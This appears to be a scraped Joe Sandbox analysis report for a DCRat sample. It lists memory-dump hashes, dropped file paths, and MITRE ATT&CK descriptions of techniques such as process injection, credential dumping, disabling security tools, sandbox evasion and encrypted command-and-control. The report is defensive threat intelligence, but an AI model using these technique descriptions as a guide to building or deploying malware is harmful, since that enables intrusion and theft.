Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
Instruction ID: 58f5180c06c67a949dcfe7f39bd44abea5061375aa129419e7db65b443bea11d
Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
Instruction Fuzzy Hash: 5BD01270A1C5D38DF33A7F41853833E66A19F513C1E60003ED09F4A8C6CD2CB801661A

Function 00007FF8496212DF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
Instruction ID: 637081ded260ab0185f178d8be119af1f28134a5f97684c05d420111f9e832d9
Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
Instruction Fuzzy Hash: 17C04C14F0D2D39FE6317BB4585193926901F0B288B150971D51A8A2C3D85C78846A95

Non-executed Functions

Function 00007FF849976398 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3414891600.00007FF849970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849970000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66aa4c200db1796274454cbc0dc2ba29befef5da94aecac3351e330d828675db
Instruction ID: 1906c89b3c65503116b3426c8b94c9f59264b843d42ec5f0b8143f7138a1e36d
Opcode Fuzzy Hash: 66aa4c200db1796274454cbc0dc2ba29befef5da94aecac3351e330d828675db
Instruction Fuzzy Hash: C8217C3184E3C24FD753AB708C681907FB0EF57210B0A42EBC095CB0E3DA5C285AD722

Function 00007FF848F209B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF848F20B46
!k9, xrefs: 00007FF848F20B4E
#{9, xrefs: 00007FF848F20B3E
c9, xrefs: 00007FF848F20B56

Memory Dump Source

Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
Instruction ID: 0681076a377dcda6742e77cbd2865407bc82f9de8890ac9bb63ac41a2e4d4c9f
Opcode Fuzzy Hash: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
Instruction Fuzzy Hash: 88414D17A2F562AAE15137BDB4412EEABA4EF812BDF484777E14C8D0C34E0C648582FD

Function 00007FF84986B10E Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF84986BA7B
{, xrefs: 00007FF84986B12A
+, xrefs: 00007FF84986B137
0, xrefs: 00007FF84986BA53

Memory Dump Source

Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: +$0$0${
API String ID: 0-1355733333
Opcode ID: fd83137e0f47ee8fb01aefb0e52161e1566107bbd2152f814b53763caa69c259
Instruction ID: 82579a0ef524c45cde0be80782be029cab82337349c2010f01b202fc81e56574
Opcode Fuzzy Hash: fd83137e0f47ee8fb01aefb0e52161e1566107bbd2152f814b53763caa69c259
Instruction Fuzzy Hash: AE114F70D08299CFEB64EF49C444BAC73F1EF44345F0085BAC41AAB280C7795986CF40

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9FwQYJSj4N.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Common Files\81eb946674e99f

C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe

C:\Program Files\Windows Photo Viewer\en-GB\81eb946674e99f

C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe

C:\Recovery\6dd19aba3e2428

C:\Recovery\ApplicationFrameHost.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Providerbroker.exe.log

C:\Users\user\AppData\Local\Temp\0AZGjm1DVG

C:\Users\user\AppData\Local\Temp\0MQKc7KiGj

C:\Users\user\AppData\Local\Temp\0utajUt79J

Windows Analysis Report
9FwQYJSj4N.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre